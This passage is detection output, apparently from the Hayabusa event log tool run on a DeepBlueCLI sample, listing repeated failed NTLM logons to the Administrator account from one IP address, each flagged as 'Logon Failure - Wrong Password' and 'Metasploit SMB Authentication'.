Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KE9v6wzrebvjvDIl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81gmRFFBHI1s4dqi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C8gHWPDjQM8M3tiQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: szj4mJvtFV06CuR2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ceGEl87hOM0InAAd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XRv3C3rRxYXTgckj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TaPkJPIQnbL3VyUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LZ7PZAT6hWWHNc29 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJVD4uVhwfLSJ6Ab : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6KME1I6tE0v9UAq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Qtt1rk4n3tOJko2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: prPsA8EZHGfGPSHm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TQqGXnwHtB87LSzT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6uLT1bjaIS0XBsWC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PIgpraQTxFrcLphN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1D6qy57XImq4prx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Kw44Ffh4DIPlyuM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oKUdmKU74RmJysAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gZUTzZw0T1tYRSP5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nEOfjuAMa7HTsfcP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e7bG19emMTmyBQNm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.243 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YsLkgWukfqS3wWJK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: liFcZjjpY3xXwe9j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vBUgbfzx2OEcOxWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iVCV0WoZmLTFNH71 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJmxGOqck4oQi1kL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w7lYqaUvEtTp18DK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yZ9xQmGn61JJDeQS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XuMXpvY9fmLm0eBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ofesuNErTLWuN0k4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KsNq7SThd3b8oTwF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmRWg5gNRcxDMFjg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.797 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JXrGn6LehVwTGNNj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vIq9DS71jCjWbgdY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kw2BQbdUml0EPNOs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ugOqsKQFGmmLac3s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3rZHUbOUVBYiHarB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: otv8ByrbWWoTz7pi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HVlHkJu4Gxc9dhxM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xKF5OCqLVVKvung0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: avAdpkOlP0xji1vG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VFgzMjEz6M0LBnX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kdJb0obVAqkY9GCw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ciSoQcLUgLfzaNg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RECrGCCTJuDPlvYJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Z2w67uyC2NOgecT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRVetRdHvz0lJkOC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 